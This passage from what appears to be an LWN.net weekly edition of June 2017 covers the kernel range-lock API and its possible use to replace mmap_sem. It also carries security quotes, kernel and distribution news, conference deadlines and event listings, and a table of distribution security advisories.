    DEFINE_RANGE_LOCK(my_lock, start, end);
    DEFINE_RANGE_LOCK_FULL(name);

The second variant above will describe a lock on the entire range. It is also possible to initialize a range_lock structure at run time with either of:

    void range_lock_init(struct range_lock *lock, unsigned long start,
    			 unsigned long end);
    void range_lock_init_full(struct range_lock *lock);

Actually acquiring a range lock requires calling one of a large set of primitives. In the simplest case, a call to range_read_lock() will acquire a read lock on the indicated range, blocking if necessary to wait for the range to become available:

    void range_read_lock(struct range_lock_tree *tree, struct range_lock *lock);

The lock for the entire resource is provided as tree, while lock describes the region that is to be locked. Like most sleeping lock primitives, read_range_lock() will go into a non-interruptible sleep if it must wait. That behavior can be changed by calling one of the other locking functions:

    int range_read_lock_interruptible(struct range_lock_tree *tree,
				      struct range_lock *lock);
    int range_read_lock_killable(struct range_lock_tree *tree, struct range_lock *lock);
    int range_read_trylock(struct range_lock_tree *tree, struct range_lock *lock);

In any case, a read lock that has been granted must eventually be released with:

    void range_read_unlock(struct range_lock_tree *tree, struct range_lock *lock);

If, instead, the range must be written to, a write lock should be obtained with one of:

    void range_write_lock(struct range_lock_tree *tree, struct range_lock *lock);
    int range_write_lock_interruptible(struct range_lock_tree *tree,
				       struct range_lock *lock);
    int range_write_lock_killable(struct range_lock_tree *tree, struct range_lock *lock);
    int range_write_trylock(struct range_lock_tree *tree, struct range_lock *lock);

A call to range_write_unlock() will release a write lock. It is also possible to turn a write lock into a read lock with:

    void range_downgrade_write(struct range_lock_tree *tree, struct range_lock *lock);

The implementation does not give any particular priority to either readers or writers. If a writer is waiting for a given range, a reader that arrives later requesting an intersecting range will wait behind the writer, even if other readers are active in that range at the time. The result is, possibly, less concurrency than might otherwise be possible, but this approach also ensures that writers will not be starved for access.

This patch set has been through a few revisions and does not seem to be generating much more in the way of comments, so it might be about ready to go. The first user is the Lustre filesystem, which is already using a variant of Kara's range-lock implementation internally to control access to ranges of files. But there is a potentially more interesting user waiting on the wings: using range locks as a replacement for mmap_sem.

The reader/writer semaphore known as mmap_sem is one of the most intractable contention points in the memory-management subsystem. It protects a process's memory map, including, to an extent, the page tables. Many performance-sensitive operations, such as handling page faults, must acquire mmap_sem with the result that, on many workloads, contention for mmap_sem is a significant performance bottleneck. Protecting a process's virtual address space would appear to be a good application for a range lock. Most of the time, a change to the address space does not affect the entire space; it is, instead, focused on a particular set of addresses. Using range locks would allow more operations on a given address space to proceed concurrently, reducing contention and improving performance.

The patch set (posted by Laurent Dufour) does not yet achieve that goal; instead, the entire range is locked every time. Thus, with these patches, a range lock replaces mmap_sem without really changing how things work. Restricting the change in this way allows the developers to be sure that the switch to a range lock has not introduced any bugs of its own. Once confidence in that change exists, developers will be able to start reducing the ranges to what is actually needed.

These changes will need to be made with care, especially since what is being protected by mmap_sem is not always clear. But, given enough development cycles, the mmap_sem bottleneck should slowly dissolve away, leaving us with a faster, more concurrent memory-management subsystem. Some improvements are worth waiting for.

Comments (10 posted)

Page editor: Jake Edge

Brief items

Security

Security quotes of the week

In fact nobody really cared about pollution until a river actually lit on fire. There are still some who don't, even after a river lit on fire.

I think there are many of us in security who keep waiting for demand to appear for more security. We keep watching and waiting, any day now everyone will see why this matters! It's not going to happen though. We do need security more and more each day. The way everything is heading, things aren't looking great. I'd like to think we won't have to wait for the security equivalent of a river catching on fire, but I'm pretty sure that's what it will take.

Josh Bressers

Up till now, we've known how to make two kinds of fairly secure system. There's the software in your phone or laptop which is complex and exposed to online attack, so has to be patched regularly as vulnerabilities are discovered. It's typically abandoned after a few years as patching too many versions of software costs too much. The other kind is the software in safety-critical machinery which has tended to be stable, simple and thoroughly tested, and not exposed to the big bad Internet. As these two worlds collide, there will be some rather large waves.

Regulators who only thought in terms of safety will have to start thinking of security too. Safety engineers will have to learn adversarial thinking. Security engineers will have to think much more about ease of safe use. Educators will have to start teaching these subjects together. (I just expanded my introductory course on software engineering into one on software and security engineering.) And the policy debate will change too; people might vote for the FBI to have a golden master key to unlock your iPhone and read your private messages, but they might be less likely to vote them a master key to take over your car or your pacemaker.

Ross Anderson

People inside the NSA are quick to discount these studies, saying that the data don't reflect their reality. They claim that there are entire classes of vulnerabilities the NSA uses that are not known in the research world, making rediscovery less likely. This may be true, but the evidence we have from the Shadow Brokers is that the vulnerabilities that the NSA keeps secret aren't consistently different from those that researchers discover. And given the alarming ease with which both the NSA and CIA are having their attack tools stolen, rediscovery isn't limited to independent security research.
Bruce Schneier

Comments (none posted)

Kernel development

Kernel release status

The current development kernel is 4.12-rc4, which was released on June 4. Linus Torvalds is generally happy with where things are: "Things remain fairly calm for 4.12, although not quite as calm as it appeared earlier in the week. I think two thirds of the commits came in on Friday or the weekend. But timing aside, it all looks fairly normal."

Stable kernels: 4.11.4, 4.9.31, 4.4.71, and 3.18.56 were released on June 7.

Comments (none posted)

Linux 4.1.40 is vulnerable to CVE-2017-6074

Mark H. Weaver has sent us an alert that the 4.1.40 long-term stable kernel is still susceptible to CVE-2017-6074, which is a local privilege escalation that was reported back in February and has been in Linux for more than ten years. An updated version of the kernel from maintainer Sasha Levin is expected soon.

Full Story (comments: none)

Distributions

Gentoo dropping support of SPARC

The Gentoo security team has announced that the SPARC architecture will no longer be supported by the security team. "This decision follows the council decision on 2016-12-11, 'The council defers to the security team, but is supportive of dropping security support for sparc if it is unable to generally meet the security team timelines.'"

Full Story (comments: 12)

Distribution quote of the week

So I suggest to introduce a new bug report severity "annoying" which is placed somewhere around "normal", but is one of the "release-critical" severities.

Any bug with that severity and at least three "me too" or "+1" postings is allowed to be fixed with a zero-day NMU.

Additionally I suggest a new tag for bug reports named "popcorn": It's similar to the "security" tag, where all bugs tagged as "security" automatically take the security team into Cc. All bugs tagged with "popcorn" are automatically carbon-copied to the debian-curiosa mailing list.

Axel Beckert

Comments (none posted)

Development

GDB 8.0 released

Version 8.0 of the GDB debugger is out. Changes in this release include some Python scripting enhancements, DWARF version 5 support, some new targets, and more.

Full Story (comments: none)

GnuPG funding campaign

The GnuPG Project has announced the launch of a funding campaign to further support and improve its mail and data encryption software, GnuPG. "The 6 person development team is currently financed from a successful campaign in early 2015, regular donations from the Linux Foundation, Stripe, Facebook, and a few paid development projects. To ensure long-term stability the new campaign focuses on recurring donations and not one-time donations."

Full Story (comments: 1)

Rivendell v2.16.0

Rivendell 2.16.0 has been released. Rivendell is a radio automation system targeted for use in professional broadcast environments. This version includes audio store hashing, kernel GPIO, Modbus TCP support, and more.

Full Story (comments: none)

Tor Browser 7.0 released

The Tor Browser Team has announced the first stable release in the 7.0 series. "This release brings us up to date with Firefox 52 ESR which contains progress in a number of areas: Most notably we hope having Mozilla's multiprocess mode (e10s) and content sandbox enabled will be one of the major new features in the Tor Browser 7.0 series, both security- and performance-wise. While we are still working on the sandboxing part for Windows (the e10s part is ready), both Linux and macOS have e10s and content sandboxing enabled by default in Tor Browser 7.0. In addition to that, Linux and macOS users have the option to further harden their Tor Browser setup by using only Unix Domain sockets for communication with tor."

Comments (none posted)

Development quotes of the week

Neil did heroic work forcing my crappy software into doing things I never envisioned. Last year he needed a break and asked me to take vmdebootstrap back. I did, and have been hiding from the public eye ever since, since I was so ashamed of the code. (I created a new identity and pretended to be an international assassin and backup specialist, travelling the world forcing people to have at least one tested backup of their system. If you've noticed reports in the press about people reporting near-death experiences while holding a shiny new USB drive, that would've been my fault.)
Lars Wirzenius (Thanks to Paul Wise)

Riddell to be kicked until adding openqa to Neon
Jonathan Riddell (KDE Plasma 5.11 kicks off)

Comments (none posted)

Miscellaneous

FSF: Judge won't dismiss alleged GPL violation: Why this matters

Last month LWN pointed to an article about the Artifex v. Hancom case, in which Hancom used Artifex's Ghostscript in its office product. The Free Software Foundation looks at the case and the recent ruling. "On the latter, the judge found that the business model of Artifex indicated a loss of revenue, but also noted that harm could be found even where money isn't involved. The judge, quoting a prior case, noted that there are 'substantial benefits, including economic benefits, to the creation and distribution of copyrighted works under public licenses that range far beyond traditional license royalties.' While not [dispositive], this last note is particularly interesting for many free software developers, who generally share their work at no cost."

Full Story (comments: none)

Page editor: Jake Edge

Announcements

Newsletters

Distributions and system administration

Development

Meeting minutes

Calls for Presentations

DebConf17 CfP Reminder and Deadline Extension

DebConf will be held August 6-12 in Montreal, Canada. The call for proposals deadline has been extended until June 11.

Full Story (comments: none)

Call for Papers - PGConf.ASIA 2017

PGconf.ASIA will be held December 4-6 in Tokyo, Japan. The submission deadline is July 31.

Full Story (comments: none)

PGConf.EU 2017 Call for Papers and Sponsors

PGConf.EU will be held October 24-27 in Warsaw, Poland. "It will cover topics for PostgreSQL users, developers and contributors, as well as decision and policy makers." The call for proposals closes August 7.

Full Story (comments: none)

CFP Deadlines: June 8, 2017 to August 7, 2017

The following listing of CFP deadlines is taken from the LWN.net CFP Calendar.

DeadlineEvent Dates EventLocation
June 8 August 25
August 27
GNU Hackers' Meeting 2017 Kassel, Germany
June 11 August 6
August 12
DebConf 2017 Montreal, Quebec, Canada
June 15 October 25
October 27
KVM Forum 2017 Prague, Czech Republic
June 15 August 9
August 11
The Perl Conference Amsterdam, Netherlands
June 16 October 31
November 2
API Strategy & Practice Conference Portland, OR, USA
June 20 June 26
June 28
19th German Perl Workshop 2017 in Hamburg Hamburg, Germany
June 24 August 28
September 1
10th European Conference on Python in Science Erlangen, Germany
June 30 November 21
November 24
Open Source Monitoring Conference 2017 Nürnberg, Germany
June 30 October 21 7th Real-Time Summit Prague, Czech Republic
June 30 September 8
September 10
GNU Tools Cauldron 2017 Prague, Czech Republic
July 8 October 23
October 25
Open Source Summit Europe Prague, Czech Republic
July 8 October 23
October 25
Embedded Linux Conference Europe Prague, Czech Republic
July 10 August 26 FOSSCON Philadelphia, PA, USA
July 14 September 29
September 30
Ohio LinuxFest Columbus, OH, USA
July 14 November 6
November 8
OpenStack Summit Sydney, Australia
July 15 November 4
November 5
Free Society Conference and Nordic Summit Oslo, Norway
July 18 October 6
October 8
PyGotham New York, NY, USA
July 30 October 25
October 27
PyCon DE Karlsruhe, Germany
July 31 December 4
December 6
PGconf.ASIA 2017 Tokyo, Japan
July 31 August 25
August 26
Swiss Perl Workshop Villars-sur-Ollon, Switzerland
August 1 April 9
April 12
‹Programming› 2018 Nice, France
August 1 August 22
August 29
Nextcloud Conference Berlin, Germany
August 1 September 26 OpenStack Days UK London, UK
August 2 September 20
September 22
X.org Developers Conference Mountain View, CA, USA
August 2 October 4
October 5
Lustre Administrator and Developer Workshop Paris, France
August 6 October 6
October 7
Seattle GNU/Linux Conference Seattle, WA, USA
August 6 January 22
January 26
linux.conf.au Sydney, Australia

If the CFP deadline for your event does not appear here, please tell us about it.

Upcoming Events

Events: June 8, 2017 to August 7, 2017

The following event listing is taken from the LWN.net Calendar.

Date(s)EventLocation
June 9 PgDay Argentina 2017 Santa Fe, Argentina
June 9
June 10
Hong Kong Open Source Conference 2017 Hong Kong, Hong Kong
June 9
June 11
SouthEast LinuxFest Charlotte, NC, USA
June 12
June 14
PyCon Israel Ramat Gan, Israel
June 12
June 15
OPNFV Summit Beijing, China
June 18
June 23
The Perl Conference Washington, DC, USA
June 19
June 20
LinuxCon + ContainerCon + CloudOpen China Beijing, China
June 20
June 22
O’Reilly Fluent Conference San Jose, CA, USA
June 20
June 22
O'Reilly Velocity Conference San Jose, CA, USA
June 20
June 23
Open Source Bridge Portland, OR, USA
June 23
June 24
QtDay 2017 Florence, Italy
June 24 Tuebix: Linux Conference Tuebingen, Germany
June 24
June 25
Enlightenment Developer Days 2017 Valletta, Malta
June 26
June 28
19th German Perl Workshop 2017 in Hamburg Hamburg, Germany
June 26
June 28
Deutsche Openstack Tage 2017 München, Germany
June 26
June 29
Postgres Vision Boston, MA, USA
June 27
June 29
O’Reilly Artificial Intelligence Conference New York, NY, USA
June 30 Swiss PGDay Rapperswil, Switzerland
July 3
July 7
13th Netfilter Workshop Faro, Portugal
July 9
July 16
EuroPython 2017 Rimini, Italy
July 10
July 16
SciPy 2017 Austin, TX, USA
July 16
July 23
CoderCruise New Orleans et. al., USA/Caribbean
July 16
July 21
IETF 99 Prague, Czech Republic
July 22
July 27
Akademy 2017 Almería, Spain
July 28
August 2
GNOME Users And Developers European Conference 2017 Manchester, UK
August 3
August 8
PyCon Australia 2017 Melbourne, Australia
August 5
August 6
Conference for Open Source Coders, Users and Promoters Taipei, Taiwan
August 6
August 12
DebConf 2017 Montreal, Quebec, Canada

If your event does not appear here, please tell us about it.

Security updates

Alert summary June 1, 2017 to June 7, 2017

Dist. ID Release Package Date
Arch Linux ASA-201706-8 chromium 2017-06-07
Arch Linux ASA-201706-2 freeradius 2017-06-02
Arch Linux ASA-201706-4 gajim 2017-06-05
Arch Linux ASA-201706-3 libtasn1 2017-06-02
Arch Linux ASA-201706-5 libusbmuxd 2017-06-05
Arch Linux ASA-201706-6 tomcat7 2017-06-06
Arch Linux ASA-201706-7 tomcat8 2017-06-06
Debian DLA-981-1 LTS apng2gif 2017-06-07
Debian DLA-977-1 LTS freeradius 2017-06-05
Debian DLA-980-1 LTS ming 2017-06-06
Debian DSA-3872-1 stable nss 2017-06-01
Debian DLA-972-1 LTS openldap 2017-06-01
Debian DLA-978-1 LTS perl 2017-06-05
Debian DSA-3873-1 stable perl 2017-06-05
Debian DLA-974-1 LTS picocom 2017-06-01
Debian DLA-973-1 LTS strongswan 2017-06-01
Debian DLA-975-1 LTS wordpress 2017-06-02
Debian DLA-976-1 LTS yodl 2017-06-05
Debian DSA-3871-1 stable zookeeper 2017-06-01
Fedora FEDORA-2017-7d698eba8b F24 chromium 2017-06-03
Fedora FEDORA-2017-7d698eba8b F24 chromium-native_client 2017-06-03
Fedora FEDORA-2017-b22de5c767 F24 dropbear 2017-06-04
Fedora FEDORA-2017-8e9bd58cbb F25 dropbear 2017-06-05
Fedora FEDORA-2017-c7c3f7ed26 F25 libtasn1 2017-06-06
Fedora FEDORA-2017-690eedcf41 F25 poppler 2017-06-06
Fedora FEDORA-2017-0b6da97aa5 F24 squirrelmail 2017-06-03
Fedora FEDORA-2017-f85c37ae3d F25 squirrelmail 2017-06-03
Fedora FEDORA-2017-54580efa82 F25 sudo 2017-06-03
Fedora FEDORA-2017-22f1a8404e F25 wget 2017-06-03
Gentoo 201706-05 dbus 2017-06-06
Gentoo 201706-09 filezilla 2017-06-06
Gentoo 201706-14 freetype 2017-06-06
Gentoo 201706-04 git 2017-06-06
Gentoo 201706-06 imageworsener 2017-06-06
Gentoo 201706-11 libpcre 2017-06-06
Gentoo 201706-13 minicom 2017-06-06
Gentoo 201706-01 munge 2017-06-06
Gentoo 201706-08 mupdf 2017-06-06
Gentoo 201706-10 pidgin 2017-06-06
Gentoo 201706-03 qemu 2017-06-06
Gentoo 201706-07 rpcbind 2017-06-06
Gentoo 201706-02 shadow 2017-06-06
Gentoo 201706-15 webkit-gtk 2017-06-07
Gentoo 201706-12 wireshark 2017-06-06
Mageia MGASA-2017-0153 5 git 2017-06-04
Mageia MGASA-2017-0155 5 menu-cache 2017-06-04
Mageia MGASA-2017-0152 5 openvpn 2017-06-01
Mageia MGASA-2017-0154 5 pcmanfm 2017-06-04
openSUSE openSUSE-SU-2017:1497-1 42.2 deluge 2017-06-07
openSUSE openSUSE-SU-2017:1485-1 42.2 libupnp 2017-06-05
openSUSE openSUSE-SU-2017:1475-1 42.2 mariadb 2017-06-02
openSUSE openSUSE-SU-2017:1495-1 42.2 postgresql93 2017-06-07
Oracle ELSA-2017-3579 OL6 kernel 2017-06-01
Oracle ELSA-2017-3580 OL6 kernel 2017-06-01
Oracle ELSA-2017-3579 OL7 kernel 2017-06-01
Oracle ELSA-2017-3580 OL7 kernel 2017-06-01
Oracle ELSA-2017-1381 OL5 sudo 2017-06-02
SUSE SUSE-SU-2017:1471-1 SLE11 strongswan 2017-06-01
Ubuntu USN-3311-1 14.04 16.04 16.10 17.04 libnl3 2017-06-06
Ubuntu USN-3309-1 14.04 16.04 16.10 17.04 libtasn1-6 2017-06-05
Ubuntu USN-3310-1 16.04 16.10 17.04 lintian 2017-06-06
Ubuntu USN-3312-1 16.04 linux, linux-aws, linux-gke, linux-raspi2, linux-snapdragon 2017-06-06
Ubuntu USN-3313-1 16.10 linux, linux-raspi2 2017-06-06
Ubuntu USN-3314-1 17.04 linux, linux-raspi2 2017-06-06
Ubuntu USN-3313-2 16.04 linux-hwe 2017-06-06
Ubuntu USN-3312-2 14.04 linux-lts-xenial 2017-06-06
Ubuntu USN-3308-1 14.04 puppet 2017-06-05
Full Story (comments: none)

Kernel patches of interest

Kernel releases

Linus Torvalds Linux 4.12-rc4 Jun 04
Greg KH Linux 4.11.4 Jun 07
Greg KH Linux 4.9.31 Jun 07
Greg KH Linux 4.4.71 Jun 07
Greg KH Linux 3.18.56 Jun 07
Ben Hutchings Linux 3.16.44 Jun 06
Ben Hutchings Linux 3.2.89 Jun 06

Architecture-specific

Core kernel

Joe Lawrence livepatch: add shadow variable API Jun 01
Sergey Senozhatsky printk: introduce printing kernel threads Jun 02
Goldwyn Rodrigues No wait AIO Jun 05
Nicolas Pitre scheduler tinification Jun 06

Device drivers

Aleksa Sarai tty: add TIOCGPTPEER ioctl Jun 02
Raviteja Garimella Support for USB DRD Phy driver for NS2 Jun 02
sean.wang@mediatek.com Add PMIC support to MediaTek MT7622 SoC Jun 03
Srinath Mannam Broadcom Stingray SATA PHY support Jun 05
thor.thayer@linux.intel.com Add Altera I2C Controller Driver Jun 02
Russell King - ARM Linux Add phylib support for MV88X3310 10G phy Jun 05
Heikki Krogerus New driver for UCSI (USB Type-C) Jun 05
Keiji Hayashibara add UniPhier watchdog support Jun 06
Rajmohan Mani TPS68470 PMIC drivers Jun 06
Christopher Bostic FSI device driver implementation Jun 06

Device-driver infrastructure

Filesystems and block layer

Networking

"Christoph Paasch" (via mptcp-dev Mailing List) <mptcp-dev-1cNGNKGn6cRWdXg3Zgxhqoble9XqW/aP@public.gmane.org> MPTCP Stable Release v0.92 Jun 04

Security-related

Virtualization and containers

Miscellaneous

Karel Zak util-linux v2.30 Jun 02

Page editor: Rebecca Sobol


Copyright © 2017, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds